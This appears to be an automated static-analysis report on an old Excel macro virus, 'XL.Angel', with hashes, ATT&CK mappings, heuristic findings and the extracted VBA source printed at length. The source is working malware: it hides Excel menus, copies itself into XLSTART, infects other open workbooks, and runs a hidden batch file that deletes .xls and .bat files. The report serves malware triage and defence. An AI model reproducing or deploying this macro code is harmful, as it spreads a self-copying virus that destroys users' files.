Xls.Trojan.Dbt-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 8f626fa6ca05e431…

MALICIOUS

Office (OLE)

82.0 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: f989de14d65a25b86495c3fb2ead63ad SHA-1: 32e5cb32ef5609ea16496fc6abebbd9a04f9ae97 SHA-256: 8f626fa6ca05e431a4b77ad20a6869fee24190282e1579ea8445d47f18fdd7d0
400 Risk Score

Malware Insights

Xls.Trojan.Dbt-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

This Excel document contains malicious VBA macros, specifically a Workbook_Open macro that attempts to copy itself to the XLSTART directory and execute a batch file to delete existing XLS files. The macro also uses the Shell() function, indicating an attempt to execute arbitrary commands. The presence of the 'XL.Angel Virus' comment and the self-copying behavior strongly suggest a trojan designed for persistence and propagation.

Heuristics 8

  • ClamAV: Xls.Trojan.Dbt-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Dbt-1
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 59,144 bytes but its declared streams total only 0 bytes — 59,144 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20838 bytes
SHA-256: bb9a3768be7306d5edc22a788c1df1aaefd8bfa9f604f67098d17bc1e140ed6f
Detection
ClamAV: Xls.Trojan.Dbt-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'XL.Angel Virus
'For Educational Purposes only
'Do not Distribute
'koded by D@rkByTe
Private Sub Workbook_BeforeClose(Cancel As Boolean)
ChDir ("c:\My documents")
Call copyvir
If ActiveWorkbook.Name = "Angel.xls" Then ActiveWorkbook.Save
If ActiveWorkbook.Saved = False Then
ChDir ("c:\My documents")
Application.Dialogs(xlDialogSaveAs).Show
Else
    ChDir ("c:\My documents")
    ActiveWorkbook.Save
End If
End Sub

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
ChDir ("c:\My documents")
If ActiveWorkbook.Name = "Angel.xls" Then ActiveWorkbook.Save
If ActiveWorkbook.Saved = False Then
  ChDir ("c:\My documents")
  Application.Dialogs(xlDialogSaveAs).Show
Else
    ChDir ("c:\My documents")
    ActiveWorkbook.Save
End If
End Sub

Private Sub Workbook_Open()
Call stealth
If Me.Name = "Angel.xls" Then
Workbooks.Add
copyvir
End If
End Sub

Sub copyvir()
q = Application.Path & "\xlstart"
ChDir (q)
w = Dir("*.xls")
If w = "" Or w <> "Angel.xls" Then
    Open "delxls.bat" For Output As #1
    Print #1, "del *.xls"
    Print #1, "del *.bat"
    Print #1, "exit"
    Close #1
    t = Shell("delxls.bat /c", vbHide)
    Set newBook = Workbooks.Add
    With newBook
        .Title = "Angel"
        .Subject = "Virus"
        .SaveAs FileName:="Angel.xls"
    End With
Call copyvir2
End If

Call copyvir2
End Sub
Sub copyvir2()
For Each w In Workbooks
 For d = 1 To w.VBProject.VBComponents.Count
  infected = w.VBProject.VBComponents(d).CodeModule.Find("Angel", 1, 1, 1000, 1000)
If infected = True Then
    haba = w.VBProject.VBComponents(d).CodeModule.CountOfLines
    code = w.VBProject.VBComponents(d).CodeModule.Lines(1, haba) & Chr(13) & "'" & "Infected Date :  " & Date

End If
 Next d
Next w
For Each w In Workbooks
 For d = 1 To w.VBProject.VBComponents.Count
  infected = w.VBProject.VBComponents(d).CodeModule.Find("Angel", 1, 1, 1000, 1000)
If infected = False Then
     w.VBProject.VBComponents(d).CodeModule.InsertLines 1, code
     
End If
 Next d
Next w
End Sub
Sub stealth()

Application.Dialogs(xlDialogRun).Application.EnableEvents = False
Application.CommandBars("Tools").Reset
Application.RecentFiles.Maximum = 0
Application.CommandBars("Tools").Controls("Macro").Enabled = False
Application.CommandBars("View").Controls("Toolbars").Enabled = False
Application.CommandBars("Tools").Controls("Customize...").Enabled = False
Application.CommandBars("Tools").Controls("Options...").Enabled = False

Application.CommandBars("Visual Basic").Visible = False
Application.CommandBars("Visual Basic").Controls("Macros...").Enabled = False
End Sub
'Infected Date :  2/22/2000

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'XL.Angel Virus
'For Educational Purposes only
'Do not Distribute
'koded by D@rkByTe
Private Sub Workbook_BeforeClose(Cancel As Boolean)
ChDir ("c:\My documents")
Call copyvir
If ActiveWorkbook.Name = "Angel.xls" Then ActiveWorkbook.Save
If ActiveWorkbook.Saved = False Then
ChDir ("c:\My documents")
Application.Dialogs(xlDialogSaveAs).Show
Else
    ChDir ("c:\My documents")
    ActiveWorkbook.Save
End If
End Sub

Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
ChDir ("c:\My documents")
If ActiveWorkbook.Name = "Angel.xls" Then ActiveWorkbook.Save
If ActiveWorkbook.Saved = False Then
  ChDir ("c:\My documents")
  Application.Dialogs(xlDialogSaveAs).Show
Else
    ChDir ("c:\My documents")
    ActiveWorkbook.Save
End If
End Sub

Private Sub Workbook_Open()
Call stealth
If Me.Name = "A
... (truncated)
embedded_office_off000060f8.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x60F8 59144 bytes
SHA-256: 83bff5e22483847a88ecbdf1cde91c044043726f05efb5b8f6d2deb9899187ac
embedded_office_off00008e19.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x8E19 47591 bytes
SHA-256: f6993f3eb8799605648d5020ec3019d8d2c65f1ea4a429c00e4d286684b08f80

Open this report in the interactive analyzer, or submit your own file for analysis.